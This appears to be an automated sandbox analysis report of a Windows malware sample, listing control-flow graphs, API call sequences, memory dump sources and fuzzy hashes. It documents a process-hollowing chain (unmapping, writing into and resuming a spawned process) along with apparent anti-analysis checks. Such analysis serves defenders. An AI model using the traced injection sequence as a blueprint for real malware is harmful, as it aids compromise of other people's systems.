                                                                                                                                                              execution_graph 600 a87b8c 603 a87b94 600->603 604 a87ba3 603->604 607 a88334 604->607 609 a8834f 607->609 608 a88358 CreateToolhelp32Snapshot 608->609 610 a88374 Module32First 608->610 609->608 609->610 611 a88383 610->611 613 a87b93 610->613 614 a87ff3 611->614 615 a8801e 614->615 616 a8802f VirtualAlloc 615->616 617 a88067 615->617 616->617 618 a50000 621 a50630 618->621 620 a50005 622 a5064c 621->622 624 a51577 622->624 627 a505b0 624->627 631 a505dc 627->631 628 a505e2 GetFileAttributesA 628->631 629 a5061e 631->628 631->629 632 a50420 631->632 633 a504f3 632->633 634 a504ff CreateWindowExA 633->634 635 a504fa 633->635 634->635 636 a50540 PostMessageA 634->636 635->631 637 a5055f 636->637 637->635 639 a50110 VirtualAlloc GetModuleFileNameA 637->639 640 a50414 639->640 641 a5017d CreateProcessA 639->641 640->637 641->640 643 a5025f VirtualFree VirtualAlloc Wow64GetThreadContext 641->643 643->640 644 a502a9 ReadProcessMemory 643->644 645 a502e5 VirtualAllocEx NtWriteVirtualMemory 644->645 646 a502d5 NtUnmapViewOfSection 644->646 647 a5033b 645->647 646->645 648 a50350 NtWriteVirtualMemory 647->648 649 a5039d WriteProcessMemory Wow64SetThreadContext ResumeThread 647->649 648->647 650 a503fb ExitProcess 649->650

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00A50156
                                                                                                                                                              • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 00A5016C
                                                                                                                                                              • CreateProcessA.KERNELBASE(?,00000000), ref: 00A50255
                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00A50270
                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00A50283
                                                                                                                                                              • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 00A5029F
                                                                                                                                                              • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 00A502C8
                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 00A502E3
                                                                                                                                                              • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00A50304
                                                                                                                                                              • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 00A5032A
                                                                                                                                                              • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00A50399
                                                                                                                                                              • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 00A503BF
                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 00A503E1
                                                                                                                                                              • ResumeThread.KERNELBASE(00000000), ref: 00A503ED
                                                                                                                                                              • ExitProcess.KERNEL32(00000000), ref: 00A50412
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000039.00000002.2539907953.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_57_2_a50000_cdttvvc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 93872480-0
                                                                                                                                                              • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                              • Instruction ID: f8f678a35dacf287637cd1c36dea49cb462d16eeaf2116520a8cb5c044477a25
                                                                                                                                                              • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                              • Instruction Fuzzy Hash: 4FB1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E909AB391D771AD45CF94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 15 a50420-a504f8 17 a504ff-a5053c CreateWindowExA 15->17 18 a504fa 15->18 20 a50540-a50558 PostMessageA 17->20 21 a5053e 17->21 19 a505aa-a505ad 18->19 22 a5055f-a50563 20->22 21->19 22->19 23 a50565-a50579 22->23 23->19 25 a5057b-a50582 23->25 26 a50584-a50588 25->26 27 a505a8 25->27 26->27 28 a5058a-a50591 26->28 27->22 28->27 29 a50593-a50597 call a50110 28->29 31 a5059c-a505a5 29->31 31->27
                                                                                                                                                              APIs
                                                                                                                                                              • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00A50533
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000039.00000002.2539907953.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_57_2_a50000_cdttvvc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateWindow
                                                                                                                                                              • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                                                                              • API String ID: 716092398-2341455598
                                                                                                                                                              • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                              • Instruction ID: d961b44f513ae22ea89380898eb8862a1313d64da5d4c3cea09e3ea38fe22cb8
                                                                                                                                                              • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                              • Instruction Fuzzy Hash: 7A512A70D08388DEEB11CBE8C849BDDBFB2AF11709F144058D9447F286D3BA5A58CB66
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 32 a505b0-a505d5 33 a505dc-a505e0 32->33 34 a505e2-a505f5 GetFileAttributesA 33->34 35 a5061e-a50621 33->35 36 a505f7-a505fe 34->36 37 a50613-a5061c 34->37 36->37 38 a50600-a5060b call a50420 36->38 37->33 40 a50610 38->40 40->37
                                                                                                                                                              APIs
                                                                                                                                                              • GetFileAttributesA.KERNELBASE(apfHQ), ref: 00A505EC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000039.00000002.2539907953.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_57_2_a50000_cdttvvc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                              • String ID: apfHQ$o
                                                                                                                                                              • API String ID: 3188754299-2999369273
                                                                                                                                                              • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                              • Instruction ID: 54b2f36f8f11d4eee2503f924721c965d780bc2c37cb0f2ae53487f4820f2b57
                                                                                                                                                              • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                              • Instruction Fuzzy Hash: DA012170C0424CEEDF10DF98C5187AEBFB5AF51309F1480D9D8092B242D7B69B58CBA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 41 a88334-a8834d 42 a8834f-a88351 41->42 43 a88358-a88364 CreateToolhelp32Snapshot 42->43 44 a88353 42->44 45 a88374-a88381 Module32First 43->45 46 a88366-a8836c 43->46 44->43 47 a8838a-a88392 45->47 48 a88383-a88384 call a87ff3 45->48 46->45 51 a8836e-a88372 46->51 52 a88389 48->52 51->42 51->45 52->47
                                                                                                                                                              APIs
                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A8835C
                                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 00A8837C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000039.00000002.2540236474.0000000000A82000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A82000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_57_2_a82000_cdttvvc.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                              • Instruction ID: 09381ade35e5eb025d10303bb1a4c180cee9fd4f994b8a77b0210d5f4a7aa57c
                                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                              • Instruction Fuzzy Hash: 17F0F032200311AFD7203BF9A88CB6EB2E8FF59B21F540628E642990C0DF74EC058B61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 54 a87ff3-a8802d call a88306 57 a8807b 54->57 58 a8802f-a88062 VirtualAlloc call a88080 54->58 57->57 60 a88067-a88079 58->60 60->57
                                                                                                                                                              APIs
                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00A88044
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000039.00000002.2540236474.0000000000A82000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A82000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_57_2_a82000_cdttvvc.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                              • Instruction ID: 134283acaa19eb91aaeac2d74b4772cdc4a876a8409f089c05f15c6868dc03d1
                                                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                              • Instruction Fuzzy Hash: 3C113C79A00208EFDB01DF98CA85E99BBF5EF08751F158094F9489B362D775EA90DF80
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:6.1%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                              Total number of Nodes:19
                                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                                              execution_graph 668 402ad1 669 402ad2 668->669 671 402b56 669->671 672 40180c 669->672 673 40181b 672->673 674 40183e Sleep 673->674 676 401859 674->676 675 40186a NtTerminateProcess 677 401876 675->677 676->675 677->671 682 401818 683 40181b 682->683 684 40183e Sleep 683->684 686 401859 684->686 685 40186a NtTerminateProcess 687 401876 685->687 686->685 688 402a9d 689 402ad2 688->689 690 40180c 2 API calls 689->690 691 402b56 689->691 690->691

                                                                                                                                                              Callgraph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                              • Disassembly available
                                                                                                                                                              callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_004025EF 28 Function_00402BEF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                                                                                              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003B.00000002.2612177429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_59_2_400000_cdttvvc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProcessSleepTerminate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 417527130-0
                                                                                                                                                              • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                                                                                                                                                              • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                                                                                                                                                              • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                                                                                                                                                              • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                                                                                              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003B.00000002.2612177429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_59_2_400000_cdttvvc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProcessSleepTerminate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 417527130-0
                                                                                                                                                              • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                                                                                                                                                              • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                                                                                                                                                              • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                                                                                                                                                              • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                                                                                              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003B.00000002.2612177429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_59_2_400000_cdttvvc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProcessSleepTerminate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 417527130-0
                                                                                                                                                              • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                                                                                                                                                              • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                                                                                                                                                              • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                                                                                                                                                              • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                                                                                              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003B.00000002.2612177429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_59_2_400000_cdttvvc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProcessSleepTerminate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 417527130-0
                                                                                                                                                              • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                                                                                                                                                              • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                                                                                                                                                              • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                                                                                                                                                              • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                                                                                              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003B.00000002.2612177429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_59_2_400000_cdttvvc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProcessSleepTerminate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 417527130-0
                                                                                                                                                              • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                                                                                                                                                              • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                                                                                                                                                              • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                                                                                                                                                              • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:4.9%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                              Total number of Nodes:242
                                                                                                                                                              Total number of Limit Nodes:4
                                                                                                                                                              execution_graph 10946 7ff6eb4314b0 10949 7ff6eb431180 10946->10949 10948 7ff6eb4314c6 10950 7ff6eb431450 GetStartupInfoA 10949->10950 10951 7ff6eb4311b4 10949->10951 10957 7ff6eb431395 10950->10957 10952 7ff6eb4311dc Sleep 10951->10952 10953 7ff6eb4311f1 10951->10953 10952->10951 10954 7ff6eb43141c _initterm 10953->10954 10955 7ff6eb431224 10953->10955 10953->10957 10954->10955 10966 7ff6eb43d7d0 10955->10966 10957->10948 10958 7ff6eb43124c SetUnhandledExceptionFilter 10959 7ff6eb43126f 10958->10959 10960 7ff6eb4312f3 malloc 10959->10960 10961 7ff6eb43135c 10960->10961 10962 7ff6eb43131a strlen malloc memcpy 10960->10962 10988 7ff6eb4485e0 10961->10988 10964 7ff6eb431357 10962->10964 10964->10961 10967 7ff6eb43d7f2 10966->10967 10969 7ff6eb43d803 10966->10969 10967->10958 10968 7ff6eb43dab2 10968->10967 10970 7ff6eb43dabb 10968->10970 10969->10967 10969->10968 10984 7ff6eb43d87b 10969->10984 10971 7ff6eb43d5d0 8 API calls 10970->10971 10974 7ff6eb43db05 10970->10974 10971->10970 10972 7ff6eb43db32 10973 7ff6eb43d560 8 API calls 10972->10973 10976 7ff6eb43db3e 10973->10976 11065 7ff6eb43d560 10974->11065 10976->10958 10977 7ff6eb43db1e 10980 7ff6eb43d560 8 API calls 10977->10980 10978 7ff6eb43da9c 10981 7ff6eb43d5d0 8 API calls 10978->10981 10979 7ff6eb43d5d0 8 API calls 10982 7ff6eb43d8d1 10979->10982 10980->10972 10983 7ff6eb43daad 10981->10983 10982->10979 10982->10984 10986 7ff6eb43d953 10982->10986 11034 7ff6eb43d5d0 10982->11034 10983->10958 10984->10967 10984->10972 10984->10974 10984->10977 10984->10978 10984->10982 10984->10986 10986->10967 10987 7ff6eb43d982 VirtualProtect 10986->10987 10987->10986 10989 7ff6eb4485f6 10988->10989 10990 7ff6eb44870b wcslen 10989->10990 10991 7ff6eb449e0d 10989->10991 10994 7ff6eb448779 10990->10994 11125 7ff6eb4331d0 10991->11125 10993 7ff6eb449ec4 10995 7ff6eb4331d0 24 API calls 10993->10995 10996 7ff6eb448899 memset 10994->10996 10997 7ff6eb449ee3 10995->10997 10998 7ff6eb4488e7 10996->10998 11095 7ff6eb432b40 wcslen 10998->11095 11000 7ff6eb448a25 11001 7ff6eb448a41 memset 11000->11001 11002 7ff6eb448a79 11001->11002 11003 7ff6eb448aff memset 11002->11003 11004 7ff6eb448b90 11003->11004 11005 7ff6eb448ca5 memset 11004->11005 11006 7ff6eb448d17 11005->11006 11007 7ff6eb432b40 3 API calls 11006->11007 11008 7ff6eb448ebf 11007->11008 11009 7ff6eb448edb memset 11008->11009 11010 7ff6eb448f20 11009->11010 11010->10997 11011 7ff6eb432b40 3 API calls 11010->11011 11012 7ff6eb449042 11011->11012 11013 7ff6eb449054 memset 11012->11013 11014 7ff6eb44909a 11013->11014 11015 7ff6eb449125 memset 11014->11015 11016 7ff6eb449177 11015->11016 11100 7ff6eb431eb0 11016->11100 11018 7ff6eb44922f 11114 7ff6eb433020 11018->11114 11020 7ff6eb4494c5 _wcsicmp 11033 7ff6eb449401 11020->11033 11023 7ff6eb449bff memcpy 11026 7ff6eb449c2d memcpy 11023->11026 11023->11033 11024 7ff6eb449953 memcpy 11027 7ff6eb449976 memcpy 11024->11027 11024->11033 11025 7ff6eb449518 memcpy 11028 7ff6eb44953b memcpy 11025->11028 11025->11033 11026->11033 11027->11033 11028->11033 11029 7ff6eb4329a0 13 API calls 11029->11033 11031 7ff6eb4496ae memcpy 11032 7ff6eb4496d1 memcpy 11031->11032 11031->11033 11032->11033 11033->10991 11033->10993 11033->11020 11033->11023 11033->11024 11033->11025 11033->11029 11033->11031 11117 7ff6eb433320 11033->11117 11120 7ff6eb432a60 11033->11120 11123 7ff6eb433500 wcslen 11033->11123 11035 7ff6eb43d760 11034->11035 11036 7ff6eb43d5f2 11034->11036 11035->10984 11037 7ff6eb43d7b2 11036->11037 11039 7ff6eb43d69e 11036->11039 11040 7ff6eb43d65c VirtualQuery 11036->11040 11038 7ff6eb43d560 4 API calls 11037->11038 11047 7ff6eb43d7c1 11038->11047 11039->10984 11041 7ff6eb43d68a 11040->11041 11042 7ff6eb43d795 11040->11042 11041->11039 11044 7ff6eb43d710 VirtualProtect 11041->11044 11043 7ff6eb43d560 4 API calls 11042->11043 11043->11037 11044->11039 11045 7ff6eb43d74c GetLastError 11044->11045 11046 7ff6eb43d560 4 API calls 11045->11046 11046->11035 11048 7ff6eb43dab2 11047->11048 11051 7ff6eb43d7f2 11047->11051 11060 7ff6eb43d87b 11047->11060 11049 7ff6eb43d5d0 4 API calls 11048->11049 11048->11051 11053 7ff6eb43db05 11048->11053 11049->11048 11050 7ff6eb43db32 11052 7ff6eb43d560 4 API calls 11050->11052 11051->10984 11055 7ff6eb43db3e 11052->11055 11054 7ff6eb43d560 4 API calls 11053->11054 11056 7ff6eb43db1e 11054->11056 11055->10984 11058 7ff6eb43d560 4 API calls 11056->11058 11057 7ff6eb43da9c 11059 7ff6eb43d5d0 4 API calls 11057->11059 11058->11050 11061 7ff6eb43daad 11059->11061 11060->11050 11060->11051 11060->11053 11060->11056 11060->11057 11062 7ff6eb43d5d0 VirtualQuery VirtualProtect GetLastError VirtualProtect 11060->11062 11063 7ff6eb43d953 11060->11063 11061->10984 11062->11060 11063->11051 11064 7ff6eb43d982 VirtualProtect 11063->11064 11064->11063 11067 7ff6eb43d58c 11065->11067 11066 7ff6eb43d7b2 11068 7ff6eb43d560 4 API calls 11066->11068 11067->11066 11069 7ff6eb43d69e 11067->11069 11070 7ff6eb43d65c VirtualQuery 11067->11070 11078 7ff6eb43d7c1 11068->11078 11069->10977 11071 7ff6eb43d68a 11070->11071 11072 7ff6eb43d795 11070->11072 11071->11069 11075 7ff6eb43d710 VirtualProtect 11071->11075 11073 7ff6eb43d560 4 API calls 11072->11073 11073->11066 11074 7ff6eb43d7f2 11074->10977 11075->11069 11076 7ff6eb43d74c GetLastError 11075->11076 11077 7ff6eb43d560 4 API calls 11076->11077 11077->11069 11078->11074 11081 7ff6eb43dab2 11078->11081 11090 7ff6eb43d87b 11078->11090 11079 7ff6eb43d5d0 4 API calls 11079->11081 11080 7ff6eb43db32 11082 7ff6eb43d560 4 API calls 11080->11082 11081->11074 11081->11079 11083 7ff6eb43db05 11081->11083 11085 7ff6eb43db3e 11082->11085 11084 7ff6eb43d560 4 API calls 11083->11084 11086 7ff6eb43db1e 11084->11086 11085->10977 11088 7ff6eb43d560 4 API calls 11086->11088 11087 7ff6eb43da9c 11089 7ff6eb43d5d0 4 API calls 11087->11089 11088->11080 11091 7ff6eb43daad 11089->11091 11090->11074 11090->11080 11090->11083 11090->11086 11090->11087 11092 7ff6eb43d5d0 VirtualQuery VirtualProtect GetLastError VirtualProtect 11090->11092 11093 7ff6eb43d953 11090->11093 11091->10977 11092->11090 11093->11074 11094 7ff6eb43d982 VirtualProtect 11093->11094 11094->11093 11096 7ff6eb432b5e 11095->11096 11097 7ff6eb432b73 _wcsnicmp 11095->11097 11096->11000 11098 7ff6eb432b60 wcslen 11097->11098 11099 7ff6eb432b85 11097->11099 11098->11096 11098->11097 11099->11000 11101 7ff6eb431f1f 11100->11101 11102 7ff6eb431f28 memcpy 11101->11102 11103 7ff6eb431f53 11101->11103 11102->11103 11104 7ff6eb43209d wcslen memcpy 11103->11104 11105 7ff6eb4320cd memcpy 11104->11105 11106 7ff6eb4320f8 11104->11106 11105->11106 11107 7ff6eb43234c wcslen 11106->11107 11112 7ff6eb432387 11107->11112 11108 7ff6eb432696 _wcsnicmp 11110 7ff6eb43292f 11108->11110 11108->11112 11109 7ff6eb43271c _wcsnicmp 11109->11110 11109->11112 11110->11018 11111 7ff6eb4327a2 _wcsnicmp 11111->11110 11111->11112 11112->11108 11112->11109 11112->11110 11112->11111 11113 7ff6eb43290c wcsstr 11112->11113 11113->11110 11113->11112 11130 7ff6eb432bb0 memset 11114->11130 11116 7ff6eb43305c 11116->11033 11118 7ff6eb432bb0 4 API calls 11117->11118 11119 7ff6eb43334c 11118->11119 11119->11033 11121 7ff6eb432ae0 11120->11121 11122 7ff6eb432a74 wcslen 11120->11122 11121->11033 11122->11121 11124 7ff6eb43356c 11123->11124 11124->11033 11133 7ff6eb432d80 wcslen 11125->11133 11128 7ff6eb432bb0 4 API calls 11129 7ff6eb433213 11128->11129 11129->10993 11132 7ff6eb432bf8 11130->11132 11131 7ff6eb432c78 wcscpy wcscat wcslen 11131->11116 11132->11131 11134 7ff6eb432eb6 11133->11134 11140 7ff6eb432db9 11133->11140 11136 7ff6eb432ea2 11134->11136 11141 7ff6eb449fe0 11134->11141 11136->11128 11137 7ff6eb432e05 wcscpy 11139 7ff6eb432bb0 4 API calls 11137->11139 11139->11140 11140->11136 11140->11137 11148 7ff6eb448110 malloc 11141->11148 11145 7ff6eb44a012 11146 7ff6eb44a031 malloc 11145->11146 11165 7ff6eb43e570 CreateSemaphoreW 11145->11165 